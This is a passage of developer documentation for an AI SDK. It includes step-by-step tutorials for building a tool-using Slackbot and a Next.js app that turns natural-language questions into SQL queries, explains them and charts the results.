Head to your browser and open http://localhost:3000. You should see an input field and a button to upload files.
Try uploading an image or PDF and asking the model questions about it. Watch as the model's response is streamed back to you!
Using Other Providers
With the AI SDK's unified provider interface, you can easily switch to other providers that support multi-modal capabilities:
// Using Anthropic
const result = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
messages: await convertToModelMessages(messages),
});
// Using Google
const result = streamText({
model: 'google/gemini-2.5-flash',
messages: await convertToModelMessages(messages),
});
Install the provider package (@ai-sdk/anthropic or @ai-sdk/google) and update your API keys in .env.local. The rest of your code remains the same.
Where to Next?
You've built a multi-modal AI agent using the AI SDK! Experiment and extend the functionality of this application further by exploring tool calling.
title: Slackbot Agent Guide
description: Learn how to use the AI SDK to build an AI Agent in Slack.
tags: ['agents', 'chatbot']
Building an AI Agent in Slack with the AI SDK
In this guide, you will learn how to build a Slackbot powered by the AI SDK. The bot will be able to respond to direct messages and mentions in channels using the full context of the thread.
Slack App Setup
Before we start building, you'll need to create and configure a Slack app:
- Go to api.slack.com/apps
- Click "Create New App" and choose "From scratch"
- Give your app a name and select your workspace
- Under "OAuth & Permissions", add the following bot token scopes:
  - app_mentions:read
  - chat:write
  - im:history
  - im:write
  - assistant:write
- Install the app to your workspace (button under "OAuth Tokens" subsection)
- Copy the Bot User OAuth Token and Signing Secret for the next step
- Under App Home -> Show Tabs -> Chat Tab, check "Allow users to send Slash commands and messages from the chat tab"
Project Setup
This project uses the following stack:
Getting Started
- Clone the repository and check out the starter branch:
<Snippet text={[ 'git clone https://github.com/vercel-labs/ai-sdk-slackbot.git', 'cd ai-sdk-slackbot', 'git checkout starter', ]} />
- Install dependencies
<Snippet text={['pnpm install']} />
Project Structure
The starter repository already includes:
- Slack utilities (lib/slack-utils.ts), including functions for validating incoming requests, converting Slack threads to AI SDK compatible message formats, and getting the Slackbot's user ID
- General utility functions (lib/utils.ts), including initial Exa setup
- Files to handle the different types of Slack events (lib/handle-messages.ts and lib/handle-app-mention.ts)
- An API endpoint (POST) for Slack events (api/events.ts)
Event Handler
First, let's take a look at our API route (api/events.ts):
import type { SlackEvent } from '@slack/web-api';
import {
assistantThreadMessage,
handleNewAssistantMessage,
} from '../lib/handle-messages';
import { waitUntil } from '@vercel/functions';
import { handleNewAppMention } from '../lib/handle-app-mention';
import { verifyRequest, getBotId } from '../lib/slack-utils';
export async function POST(request: Request) {
const rawBody = await request.text();
const payload = JSON.parse(rawBody);
const requestType = payload.type as 'url_verification' | 'event_callback';
// See https://api.slack.com/events/url_verification
if (requestType === 'url_verification') {
return new Response(payload.challenge, { status: 200 });
}
await verifyRequest({ requestType, request, rawBody });
try {
const botUserId = await getBotId();
const event = payload.event as SlackEvent;
if (event.type === 'app_mention') {
waitUntil(handleNewAppMention(event, botUserId));
}
if (event.type === 'assistant_thread_started') {
waitUntil(assistantThreadMessage(event));
}
if (
event.type === 'message' &&
!event.subtype &&
event.channel_type === 'im' &&
!event.bot_id &&
!event.bot_profile &&
event.bot_id !== botUserId
) {
waitUntil(handleNewAssistantMessage(event, botUserId));
}
return new Response('Success!', { status: 200 });
} catch (error) {
console.error('Error generating response', error);
return new Response('Error generating response', { status: 500 });
}
}
This file defines a POST function that handles incoming requests from Slack. First, you check the request type to see if it's a URL verification request. If it is, you respond with the challenge string provided by Slack. If it's an event callback, you verify the request and then have access to the event data. This is where you can implement your event handling logic.
You then handle three types of events: app_mention, assistant_thread_started, and message:
- For app_mention, you call handleNewAppMention with the event and the bot user ID.
- For assistant_thread_started, you call assistantThreadMessage with the event.
- For message, you call handleNewAssistantMessage with the event and the bot user ID.
Finally, you respond with a success message to Slack. Note that each handler call is wrapped in the waitUntil function. Let's take a look at what this means and why it's important.
The waitUntil Function
Slack expects a response within 3 seconds to confirm the request is being handled. However, generating AI responses can take longer. If you don't respond to the Slack request within 3 seconds, Slack will send another request, leading to another invocation of your API route, another call to the LLM, and ultimately another response to the user. To solve this, you can use the waitUntil function, which allows you to run your AI logic after the response is sent, without blocking the response itself.
This means your API endpoint will:
- Immediately respond to Slack (within 3 seconds)
- Continue processing the message asynchronously
- Send the AI response when it's ready
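Here is a minimal sketch of the pattern (processSlackEvent is a hypothetical stand-in for the event handling logic shown above):
import { waitUntil } from '@vercel/functions';
// Hypothetical stand-in for your actual event handling logic
async function processSlackEvent(rawBody: string) {
  // ...call the LLM, post messages back to Slack, etc.
}
export async function POST(request: Request) {
  const rawBody = await request.text();
  // Continue the slow AI work after the response has been sent
  waitUntil(processSlackEvent(rawBody));
  // Acknowledge Slack immediately, within its 3-second window
  return new Response('Success!', { status: 200 });
}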
Event Handlers
Let's look at how each event type is currently handled.
App Mentions
When a user mentions your bot in a channel, the app_mention event is triggered. The handleNewAppMention function in handle-app-mention.ts processes these mentions:
- Checks if the message is from a bot to avoid infinite response loops
- Creates a status updater to show the bot is "thinking"
- If the mention is in a thread, it retrieves the thread history
- Calls the LLM with the message content (using the generateResponse function, which you will implement in the next section)
- Updates the initial "thinking" message with the AI response
Here's the code for the handleNewAppMention function:
import { AppMentionEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './generate-response';
const updateStatusUtil = async (
initialStatus: string,
event: AppMentionEvent,
) => {
const initialMessage = await client.chat.postMessage({
channel: event.channel,
thread_ts: event.thread_ts ?? event.ts,
text: initialStatus,
});
if (!initialMessage || !initialMessage.ts)
throw new Error('Failed to post initial message');
const updateMessage = async (status: string) => {
await client.chat.update({
channel: event.channel,
ts: initialMessage.ts as string,
text: status,
});
};
return updateMessage;
};
export async function handleNewAppMention(
event: AppMentionEvent,
botUserId: string,
) {
console.log('Handling app mention');
if (event.bot_id || event.bot_id === botUserId || event.bot_profile) {
console.log('Skipping app mention');
return;
}
const { thread_ts, channel } = event;
const updateMessage = await updateStatusUtil('is thinking...', event);
if (thread_ts) {
const messages = await getThread(channel, thread_ts, botUserId);
const result = await generateResponse(messages, updateMessage);
updateMessage(result);
} else {
const result = await generateResponse(
[{ role: 'user', content: event.text }],
updateMessage,
);
updateMessage(result);
}
}
Now let's see how new assistant threads and messages are handled.
Assistant Thread Messages
When a user starts a thread with your assistant, the assistant_thread_started event is triggered. The assistantThreadMessage function in handle-messages.ts handles this:
- Posts a welcome message to the thread
- Sets up suggested prompts to help users get started
Here's the code for the assistantThreadMessage function:
import type { AssistantThreadStartedEvent } from '@slack/web-api';
import { client } from './slack-utils';
export async function assistantThreadMessage(
event: AssistantThreadStartedEvent,
) {
const { channel_id, thread_ts } = event.assistant_thread;
console.log(`Thread started: ${channel_id} ${thread_ts}`);
console.log(JSON.stringify(event));
await client.chat.postMessage({
channel: channel_id,
thread_ts: thread_ts,
text: "Hello, I'm an AI assistant built with the AI SDK by Vercel!",
});
await client.assistant.threads.setSuggestedPrompts({
channel_id: channel_id,
thread_ts: thread_ts,
prompts: [
{
title: 'Get the weather',
message: 'What is the current weather in London?',
},
{
title: 'Get the news',
message: 'What is the latest Premier League news from the BBC?',
},
],
});
}
Direct Messages
For direct messages to your bot, the message event is triggered and the event is handled by the handleNewAssistantMessage function in handle-messages.ts:
- Verifies the message isn't from a bot
- Updates the status to show the response is being generated
- Retrieves the conversation history
- Calls the LLM with the conversation context
- Posts the LLM's response to the thread
Here's the code for the handleNewAssistantMessage function:
import type { GenericMessageEvent } from '@slack/web-api';
import { client, getThread, updateStatusUtil } from './slack-utils';
import { generateResponse } from './generate-response';
export async function handleNewAssistantMessage(
event: GenericMessageEvent,
botUserId: string,
) {
if (
event.bot_id ||
event.bot_id === botUserId ||
event.bot_profile ||
!event.thread_ts
)
return;
const { thread_ts, channel } = event;
const updateStatus = updateStatusUtil(channel, thread_ts);
updateStatus('is thinking...');
const messages = await getThread(channel, thread_ts, botUserId);
const result = await generateResponse(messages, updateStatus);
await client.chat.postMessage({
channel: channel,
thread_ts: thread_ts,
text: result,
unfurl_links: false,
blocks: [
{
type: 'section',
text: {
type: 'mrkdwn',
text: result,
},
},
],
});
updateStatus('');
}
With the event handlers in place, let's now implement the AI logic.
Implementing AI Logic
The core of our application is the generateResponse function in lib/generate-response.ts, which processes messages and generates responses using the AI SDK.
Here's how to implement it:
import { generateText, ModelMessage } from 'ai';
export const generateResponse = async (
messages: ModelMessage[],
updateStatus?: (status: string) => void,
) => {
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.5', // any supported model id works here
system: `You are a Slack bot assistant. Keep your responses concise and to the point.
- Do not tag users.
- Current date is: ${new Date().toISOString().split('T')[0]}`,
messages,
});
// Convert markdown to Slack mrkdwn format
return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};
This basic implementation:
- Uses the AI SDK's generateText function to call Anthropic's claude-sonnet-4.5 model
- Provides a system prompt to guide the model's behavior
- Formats the response for Slack's mrkdwn format
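To make that final formatting step concrete, here is what the two replace calls do to a sample string:
const md = '[Vercel](https://vercel.com) is **fast**';
const mrkdwn = md
  .replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>') // [text](url) -> <url|text>
  .replace(/\*\*/g, '*'); // **bold** -> *bold*
// mrkdwn === '<https://vercel.com|Vercel> is *fast*'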
Enhancing with Tools
The real power of the AI SDK comes from tools that enable your bot to perform actions. Let's add two useful tools:
import { generateText, tool, ModelMessage, stepCountIs } from 'ai';
import { z } from 'zod';
import { exa } from './utils';
export const generateResponse = async (
messages: ModelMessage[],
updateStatus?: (status: string) => void,
) => {
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.5', // any supported model id works here
system: `You are a Slack bot assistant. Keep your responses concise and to the point.
- Do not tag users.
- Current date is: ${new Date().toISOString().split('T')[0]}
- Always include sources in your final response if you use web search.`,
messages,
stopWhen: stepCountIs(10),
tools: {
getWeather: tool({
description: 'Get the current weather at a location',
inputSchema: z.object({
latitude: z.number(),
longitude: z.number(),
city: z.string(),
}),
execute: async ({ latitude, longitude, city }) => {
updateStatus?.(`is getting weather for ${city}...`);
const response = await fetch(
`https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current=temperature_2m,weathercode,relativehumidity_2m&timezone=auto`,
);
const weatherData = await response.json();
return {
temperature: weatherData.current.temperature_2m,
weatherCode: weatherData.current.weathercode,
humidity: weatherData.current.relativehumidity_2m,
city,
};
},
}),
searchWeb: tool({
description: 'Use this to search the web for information',
inputSchema: z.object({
query: z.string(),
specificDomain: z
.string()
.nullable()
.describe(
'a domain to search if the user specifies e.g. bbc.com. Should be only the domain name without the protocol',
),
}),
execute: async ({ query, specificDomain }) => {
updateStatus?.(`is searching the web for ${query}...`);
const { results } = await exa.searchAndContents(query, {
livecrawl: 'always',
numResults: 3,
includeDomains: specificDomain ? [specificDomain] : undefined,
});
return {
results: results.map(result => ({
title: result.title,
url: result.url,
snippet: result.text.slice(0, 1000),
})),
};
},
}),
},
});
// Convert markdown to Slack mrkdwn format
return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};
In this updated implementation:
- You added two tools:
  - getWeather: fetches weather data for a specified location
  - searchWeb: searches the web for information using the Exa API
- You set stopWhen: stepCountIs(10) to enable multi-step tool use. This defines the stopping condition of your agent when the model generates a tool call: until it is met, the AI SDK will automatically send tool results back to the LLM to trigger additional tool calls or responses as the LLM deems necessary. This turns your LLM call from a one-off operation into a multi-step agentic flow.
How It Works
When a user interacts with your bot:
- The Slack event is received and processed by your API endpoint
- The user's message and the thread history are passed to the generateResponse function
- The AI SDK processes the message and may invoke tools as needed
- The response is formatted for Slack and sent back to the user
The tools are automatically invoked based on the user's intent. For example, if a user asks "What's the weather in London?", the AI will:
- Recognize this as a weather query
- Call the getWeather tool with London's coordinates (inferred by the LLM)
- Process the weather data
- Generate a final response, answering the user's question
Deploying the App
- Install the Vercel CLI
<Snippet text={['pnpm install -g vercel']} />
- Deploy the app
<Snippet text={['vercel deploy']} />
- Copy the deployment URL and update the Slack app's Event Subscriptions to point to your Vercel URL
- Go to your project's deployment settings (Your project -> Settings -> Environment Variables) and add your environment variables
SLACK_BOT_TOKEN=your_slack_bot_token
SLACK_SIGNING_SECRET=your_slack_signing_secret
OPENAI_API_KEY=your_openai_api_key
EXA_API_KEY=your_exa_api_key
- Head back to api.slack.com and navigate to the "Event Subscriptions" page. Enable events and add your deployment URL:
https://your-vercel-url.vercel.app/api/events
- On the Event Subscriptions page, subscribe to the following events:
  - app_mention
  - assistant_thread_started
  - message:im
Finally, head to Slack and test the app by sending a message to the bot.
Next Steps
You've built a Slack chatbot powered by the AI SDK! Here are some ways you could extend it:
- Add memory for specific users to give the LLM context of previous interactions
- Implement more tools like database queries or knowledge base searches
- Add support for rich message formatting with blocks
- Add analytics to track usage patterns
title: Natural Language Postgres
description: Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language.
tags: ['agents', 'next', 'tools']
Natural Language Postgres Guide
In this guide, you will learn how to build an app that uses AI to interact with a PostgreSQL database using natural language.
The application will:
- Generate SQL queries from a natural language input
- Explain query components in plain English
- Create a chart to visualize query results
You can find a completed version of this project at natural-language-postgres.vercel.app.
Project setup
This project uses the following stack:
- Next.js (App Router)
- AI SDK
- OpenAI
- Zod
- Postgres with Vercel Postgres
- shadcn-ui and TailwindCSS for styling
- Recharts for data visualization
Clone repo
To focus on the AI-powered functionality rather than project setup and configuration, we've prepared a starter repository which includes a database schema and a few components.
Clone the starter repository and check out the starter branch:
<Snippet text={[ 'git clone https://github.com/vercel-labs/natural-language-postgres', 'cd natural-language-postgres', 'git checkout starter', ]} />
Project setup and data
Let's set up the project and seed the database with the dataset:
- Install dependencies:
<Snippet text={['pnpm install']} />
- Copy the example environment variables file:
<Snippet text={['cp .env.example .env']} />
- Add your environment variables to .env:
OPENAI_API_KEY="your_api_key_here"
POSTGRES_URL="..."
POSTGRES_PRISMA_URL="..."
POSTGRES_URL_NO_SSL="..."
POSTGRES_URL_NON_POOLING="..."
POSTGRES_USER="..."
POSTGRES_HOST="..."
POSTGRES_PASSWORD="..."
POSTGRES_DATABASE="..."
- This project uses CB Insights' Unicorn Companies dataset. You can download the dataset by following these instructions:
- Navigate to CB Insights Unicorn Companies
- Enter in your email. You will receive a link to download the dataset.
- Save it as unicorns.csv in your project root
Setting up Postgres with Vercel
To set up a Postgres instance on your Vercel account:
- Go to Vercel.com and make sure you're logged in
- Navigate to your team homepage
- Click on the Integrations tab
- Click Browse Marketplace
- Look for the Storage option in the sidebar
- Select the Neon option (recommended, but any other PostgreSQL database provider should work)
- Click Install, then click Install again in the top right corner
- On the "Get Started with Neon" page, click Create Database on the right
- Select your region (e.g., Washington, D.C., U.S. East)
- Turn off Auth
- Click Continue
- Name your database (you can use the default name or rename it to something like "NaturalLanguagePostgres")
- Click Create in the bottom right corner
- After seeing "Database created successfully", click Done
- You'll be redirected to your database instance
- In the Quick Start section, click Show secrets
- Copy the full DATABASE_URL environment variable and use it to populate the Postgres environment variables in your .env file
About the dataset
The Unicorn List dataset contains the following information about unicorn startups (companies with a valuation above $1bn):
- Company name
- Valuation
- Date joined (unicorn status)
- Country
- City
- Industry
- Select investors
This dataset contains over 1000 rows of data across 7 columns, giving us plenty of structured data to analyze. This makes it perfect for exploring various SQL queries that can reveal interesting insights about the unicorn startup ecosystem.
- Now that you have the dataset downloaded and added to your project, you can initialize the database with the following command:
<Snippet text={['pnpm run seed']} />
Note: this step can take a little while. You should see a message indicating the Unicorns table has been created and then that the database has been seeded successfully.
- Start the development server:
<Snippet text={['pnpm run dev']} />
Your application should now be running at http://localhost:3000.
Project structure
The starter repository already includes everything that you will need, including:
- Database seed script (lib/seed.ts)
- Basic components built with shadcn/ui (components/)
- Function to run SQL queries (app/actions.ts)
- Type definitions for the database schema (lib/types.ts)
Existing components
The application contains a single page in app/page.tsx that serves as the main interface.
At the top, you'll find a header (header.tsx) displaying the application title and description. Below that is an input field and search button (search.tsx) where you can enter natural language queries.
Initially, the page shows a collection of suggested example queries (suggested-queries.tsx) that you can click to quickly try out the functionality.
When you submit a query:
- The suggested queries section disappears and a loading state appears
- Once complete, a card appears with "TODO - IMPLEMENT ABOVE" (query-viewer.tsx), which will eventually show your generated SQL
- Below that is an empty results area with "No results found" (results.tsx)
After you implement the core functionality:
- The results section will display data in a table format
- A toggle button will allow switching between table and chart views
- The chart view will visualize your query results
Let's implement the AI-powered functionality to bring it all together.
Building the application
As a reminder, this application will have three main features:
- Generate SQL queries from natural language
- Create a chart from the query results
- Explain SQL queries in plain English
For each of these features, you'll use the AI SDK via Server Actions to interact with OpenAI's GPT-4o and GPT-4o-mini models. Server Actions are a powerful React Server Component feature that allows you to call server-side functions directly from your frontend code.
Let's start with generating a SQL query from natural language.
Generate SQL queries
Providing context
For the model to generate accurate SQL queries, it needs context about your database schema, tables, and relationships. You will communicate this information through a prompt that should include:
- Schema information
- Example data formats
- Available SQL operations
- Best practices for query structure
- Nuanced advice for specific fields
Let's write a prompt that includes all of this information:
You are a SQL (postgres) and data visualization expert. Your job is to help the user write a SQL query to retrieve the data they need. The table schema is as follows:
unicorns (
id SERIAL PRIMARY KEY,
company VARCHAR(255) NOT NULL UNIQUE,
valuation DECIMAL(10, 2) NOT NULL,
date_joined DATE,
country VARCHAR(255) NOT NULL,
city VARCHAR(255) NOT NULL,
industry VARCHAR(255) NOT NULL,
select_investors TEXT NOT NULL
);
Only retrieval queries are allowed.
For things like industry, company names and other string fields, use the ILIKE operator and convert both the search term and the field to lowercase using LOWER() function. For example: LOWER(industry) ILIKE LOWER('%search_term%').
Note: select_investors is a comma-separated list of investors. Trim whitespace to ensure you're grouping properly. Note, some fields may be null or have only one value.
When answering questions about a specific field, ensure you are selecting the identifying column (e.g. "what is Vercel's valuation" would select company and valuation).
The industries available are:
- healthcare & life sciences
- consumer & retail
- financial services
- enterprise tech
- insurance
- media & entertainment
- industrials
- health
If the user asks for a category that is not in the list, infer based on the list above.
Note: valuation is in billions of dollars so 10b would be 10.0.
Note: if the user asks for a rate, return it as a decimal. For example, 0.1 would be 10%.
If the user asks for 'over time' data, return by year.
When searching for UK or USA, write out United Kingdom or United States respectively.
EVERY QUERY SHOULD RETURN QUANTITATIVE DATA THAT CAN BE PLOTTED ON A CHART! There should always be at least two columns. If the user asks for a single column, return the column and the count of the column. If the user asks for a rate, return the rate as a decimal. For example, 0.1 would be 10%.
There are several important elements of this prompt:
- Schema description helps the model understand exactly what data fields to work with
- Includes rules for handling queries based on common SQL patterns - for example, always using ILIKE for case-insensitive string matching
- Explains how to handle edge cases in the dataset, like dealing with the comma-separated investors field and ensuring whitespace is properly handled
- Instead of having the model guess at industry categories, it provides the exact list that exists in the data, helping avoid mismatches
- The prompt helps standardize data transformations - like knowing to interpret "10b" as "10.0" billion dollars, or that rates should be decimal values
- Clear rules ensure the query output will be chart-friendly by always including at least two columns of data that can be plotted
This prompt structure provides a strong foundation for query generation, but you should experiment and iterate based on your specific needs and the model you're using.
Create a Server Action
With the prompt done, let's create a Server Action.
Open app/actions.ts. You should see one action already defined (runGeneratedSQLQuery).
Add a new action. This action should be asynchronous and take in one parameter - the natural language query.
/* ...rest of the file... */
export const generateQuery = async (input: string) => {};
In this action, you'll use the generateText function with Output from the AI SDK, which allows you to constrain the model's output to a pre-defined schema. This process, sometimes called structured output, ensures the model returns only the SQL query without any additional prefixes, explanations, or formatting that would require manual parsing.
/* ...other imports... */
import { generateText, Output } from 'ai';
import { z } from 'zod';
/* ...rest of the file... */
export const generateQuery = async (input: string) => {
'use server';
try {
const result = await generateText({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Generate the query necessary to retrieve the data the user wants: ${input}`,
output: Output.object({
schema: z.object({
query: z.string(),
}),
}),
});
return result.output.query;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
Note that you are constraining the output to a single string field called query using Zod, a TypeScript schema validation library. This ensures the model only returns the SQL query itself, which is then returned from the action.
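As a quick sanity check, you can call the action directly; the SQL in the comment below is a hypothetical example of what the model might return:
const sql = await generateQuery('how many unicorns are based in San Francisco?');
// e.g. "SELECT city, COUNT(*) AS count FROM unicorns
//       WHERE LOWER(city) ILIKE LOWER('%san francisco%') GROUP BY city"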
Update the frontend
With the Server Action in place, you can now update the frontend to call this action when the user submits a natural language query. In the root page (app/page.tsx), you should see a handleSubmit function that is called when the user submits a query.
Import the generateQuery function and call it with the user's input.
/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery } from './actions';
/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
clearExistingData();
const question = suggestion ?? inputValue;
if (inputValue.length === 0 && !suggestion) return;
if (question.trim()) {
setSubmitted(true);
}
setLoading(true);
setLoadingStep(1);
setActiveQuery('');
try {
const query = await generateQuery(question);
if (query === undefined) {
toast.error('An error occurred. Please try again.');
setLoading(false);
return;
}
setActiveQuery(query);
setLoadingStep(2);
const companies = await runGeneratedSQLQuery(query);
const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
setResults(companies);
setColumns(columns);
setLoading(false);
} catch (e) {
toast.error('An error occurred. Please try again.');
setLoading(false);
}
};
/* ...rest of the file... */
Now, when the user submits a natural language query (e.g. "how many unicorns are from San Francisco?"), that question will be sent to your newly created Server Action. The Server Action will call the model, passing in your system prompt and the user's query, and return the generated SQL query in a structured format. This query is then passed to the runGeneratedSQLQuery action to run against your database. The results are then saved in local state and displayed to the user.
Save the file, make sure the dev server is running, and then head to localhost:3000 in your browser. Try submitting a natural language query and see the generated SQL query and results. You should see a SQL query generated and displayed under the input field. You should also see the results of the query displayed in a table below the input field.
Try clicking the SQL query to see the full query if it's too long to display in the input field. You should see a button on the right side of the input field with a question mark icon. Clicking this button currently does nothing, but you'll add the "explain query" functionality to it in the next step.
Explain SQL Queries
Next, let's add the ability to explain SQL queries in plain English. This feature helps users understand how the generated SQL query works by breaking it down into logical sections. As with the SQL query generation, you'll need a prompt to guide the model when explaining queries.
Let's craft a prompt for the explain query functionality:
You are a SQL (postgres) expert. Your job is to explain to the user the SQL query you wrote to retrieve the data they asked for. The table schema is as follows:
unicorns (
id SERIAL PRIMARY KEY,
company VARCHAR(255) NOT NULL UNIQUE,
valuation DECIMAL(10, 2) NOT NULL,
date_joined DATE,
country VARCHAR(255) NOT NULL,
city VARCHAR(255) NOT NULL,
industry VARCHAR(255) NOT NULL,
select_investors TEXT NOT NULL
);
When you explain you must take a section of the query, and then explain it. Each "section" should be unique. So in a query like: "SELECT * FROM unicorns limit 20", the sections could be "SELECT *", "FROM UNICORNS", "LIMIT 20".
If a section doesn't have any explanation, include it, but leave the explanation empty.
Like the prompt for generating SQL queries, you provide the model with the schema of the database. Additionally, you provide an example of what each section of the query might look like. This helps the model understand the structure of the query and how to break it down into logical sections.
Create a Server Action
Add a new Server Action to generate explanations for SQL queries.
This action takes two parameters - the original natural language input and the generated SQL query.
/* ...rest of the file... */
export const explainQuery = async (input: string, sqlQuery: string) => {
'use server';
try {
const result = await generateText({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.
User Query:
${input}
Generated SQL Query:
${sqlQuery}`,
});
return result.text;
} catch (e) {
console.error(e);
throw new Error('Failed to explain query');
}
};
This action uses the generateText function. However, you haven't defined the output schema yet. Let's define it in another file so it can also be used as a type in your components.
Update your lib/types.ts file to include the schema for the explanations:
import { z } from 'zod';
/* ...rest of the file... */
export const explanationSchema = z.object({
section: z.string(),
explanation: z.string(),
});
export type QueryExplanation = z.infer<typeof explanationSchema>;
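For example, for a query like "SELECT * FROM unicorns LIMIT 20" (the example used in the prompt above), a hypothetical result matching this schema could look like:
const example: QueryExplanation[] = [
  { section: 'SELECT *', explanation: 'Select every column from each matching row.' },
  { section: 'FROM unicorns', explanation: 'Read rows from the unicorns table.' },
  { section: 'LIMIT 20', explanation: 'Return at most 20 rows.' },
];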
This schema defines the structure of the explanation that the model will generate. Each explanation will have a section and an explanation. The section is the part of the query being explained, and the explanation is the plain English explanation of that section. Go back to your actions.ts file and import and use the explanationSchema:
// other imports
import { explanationSchema } from '@/lib/types';
/* ...rest of the file... */
export const explainQuery = async (input: string, sqlQuery: string) => {
'use server';
try {
const result = await generateText({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.
User Query:
${input}
Generated SQL Query:
${sqlQuery}`,
output: Output.array({ element: explanationSchema }),
});
return result.output;
} catch (e) {
console.error(e);
throw new Error('Failed to explain query');
}
};
Update query viewer
Next, update the query-viewer.tsx component to display these explanations. The handleExplainQuery function is called every time the user clicks the question icon button on the right side of the query. Let's update this function to use the new explainQuery action:
/* ...other imports... */
import { explainQuery } from '@/app/actions';
/* ...rest of the component... */
const handleExplainQuery = async () => {
setQueryExpanded(true);
setLoadingExplanation(true);
const explanations = await explainQuery(inputValue, activeQuery);
setQueryExplanations(explanations);
setLoadingExplanation(false);
};
/* ...rest of the component... */
Now when users click the explanation button (the question mark icon), the component will:
- Show a loading state
- Send the active SQL query and the user's natural language query to your Server Action
- The model will generate an array of explanations
- The explanations will be set in the component state and rendered in the UI
Submit a new query and then click the explanation button. Hover over different elements of the query. You should see the explanations for each section!
Visualizing query results
Finally, let's render the query results visually in a chart. There are two approaches you could take:
1. Send both the query and data to the model and ask it to return the data in a visualization-ready format. While this provides complete control over the visualization, it requires the model to send back all of the data, which significantly increases latency and costs.
2. Send the query and data to the model and ask it to generate a chart configuration (fixed-size and not many tokens) that maps your data appropriately. This configuration specifies how to visualize the information while delivering the insights from your natural language query. Importantly, this is done without requiring the model to return the full dataset.
Since you don't know the SQL query or data shape beforehand, let's use the second approach to dynamically generate chart configurations based on the query results and user intent.
Generate the chart configuration
For this feature, you'll create a Server Action that takes the query results and the user's original natural language query to determine the best visualization approach. Your application is already set up to use shadcn charts (which uses Recharts under the hood) so the model will need to generate:
- Chart type (bar, line, area, or pie)
- Axis mappings
- Visual styling
Let's start by defining the schema for the chart configuration in lib/types.ts:
/* ...rest of the file... */
export const configSchema = z
.object({
description: z
.string()
.describe(
'Describe the chart. What is it showing? What is interesting about the way the data is displayed?',
),
takeaway: z.string().describe('What is the main takeaway from the chart?'),
type: z.enum(['bar', 'line', 'area', 'pie']).describe('Type of chart'),
title: z.string(),
xKey: z.string().describe('Key for x-axis or category'),
yKeys: z
.array(z.string())
.describe(
'Key(s) for y-axis values; this is typically the quantitative column',
),
multipleLines: z
.boolean()
.describe(
'For line charts only: whether the chart is comparing groups of data.',
)
.optional(),
measurementColumn: z
.string()
.describe(
'For line charts only: key for quantitative y-axis column to measure against (eg. values, counts etc.)',
)
.optional(),
lineCategories: z
.array(z.string())
.describe(
'For line charts only: Categories used to compare different lines or data series. Each category represents a distinct line in the chart.',
)
.optional(),
colors: z
.record(
z.string().describe('Any of the yKeys'),
z.string().describe('Color value in CSS format (e.g., hex, rgb, hsl)'),
)
.describe('Mapping of data keys to color values for chart elements')
.optional(),
legend: z.boolean().describe('Whether to show legend'),
})
.describe('Chart configuration object');
export type Config = z.infer<typeof configSchema>;
This schema makes extensive use of Zod's .describe() function to give the model extra context about each of the keys you are expecting in the chart configuration. This will help the model understand the purpose of each key and generate more accurate results.
Another important technique to note here is that you are defining description and takeaway fields. Not only are these useful for the user to quickly understand what the chart means and what they should take away from it, but they also force the model to generate a description of the data first, before it attempts to generate configuration attributes like axes and columns. This helps the model generate more accurate and relevant chart configurations.
Create the Server Action
Create a new action in app/actions.ts:
/* ...other imports... */
import { Config, configSchema, Result } from '@/lib/types';
/* ...rest of the file... */
export const generateChartConfig = async (
results: Result[],
userQuery: string,
) => {
'use server';
try {
const { output: config } = await generateText({
model: 'openai/gpt-4o',
system: 'You are a data visualization expert.',
prompt: `Given the following data from a SQL query result, generate the chart config that best visualises the data and answers the user's query.
For multiple groups use multi-lines.
Here is an example complete config:
export const chartConfig = {
type: "pie",
xKey: "month",
yKeys: ["sales", "profit", "expenses"],
colors: {
sales: "#4CAF50", // Green for sales
profit: "#2196F3", // Blue for profit
expenses: "#F44336" // Red for expenses
},
legend: true
}
User Query:
${userQuery}
Data:
${JSON.stringify(results, null, 2)}`,
output: Output.object({ schema: configSchema }),
});
// Override with shadcn theme colors
const colors: Record<string, string> = {};
config.yKeys.forEach((key, index) => {
colors[key] = `hsl(var(--chart-${index + 1}))`;
});
const updatedConfig = { ...config, colors };
return { config: updatedConfig };
} catch (e) {
console.error(e);
throw new Error('Failed to generate chart suggestion');
}
};
Update the chart component
With the action in place, you'll want to trigger it automatically after receiving query results. This ensures the visualization appears almost immediately after data loads.
Update the handleSubmit function in your root page (app/page.tsx) to generate and set the chart configuration after running the query:
/* ...other imports... */
import { getCompanies, generateQuery, generateChartConfig } from './actions';
/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
clearExistingData();
const question = suggestion ?? inputValue;
if (inputValue.length === 0 && !suggestion) return;
if (question.trim()) {
setSubmitted(true);
}
setLoading(true);
setLoadingStep(1);
setActiveQuery('');
try {
const query = await generateQuery(question);
if (query === undefined) {
toast.error('An error occurred. Please try again.');
setLoading(false);
return;
}
setActiveQuery(query);
setLoadingStep(2);
const companies = await runGeneratedSQLQuery(query);
const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
setResults(companies);
setColumns(columns);
setLoading(false);
const { config } = await generateChartConfig(companies, question);
setChartConfig(config);
} catch (e) {
toast.error('An error occurred. Please try again.');
setLoading(false);
}
};
/* ...rest of the file... */
